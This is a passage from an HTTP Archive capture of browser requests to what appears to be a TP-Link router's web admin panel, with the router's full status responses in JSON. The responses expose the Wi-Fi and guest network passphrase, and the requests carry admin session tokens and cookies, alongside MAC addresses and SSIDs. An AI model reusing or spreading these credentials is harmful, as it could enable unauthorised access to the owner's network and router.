},\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4755,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4755\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 276,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 674,\r\n \"receive\": 40\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:29.651+03:00\",\r\n \"time\": 1855,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 250,\r\n \"connect\": 520,\r\n \"send\": 0,\r\n \"wait\": 810,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:39.647+03:00\",\r\n \"time\": 995,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 267,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 704,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:39.651+03:00\",\r\n \"time\": 1827,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 262,\r\n \"dns\": 251,\r\n \"connect\": 530,\r\n \"send\": 0,\r\n \"wait\": 784,\r\n \"receive\": 0\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": 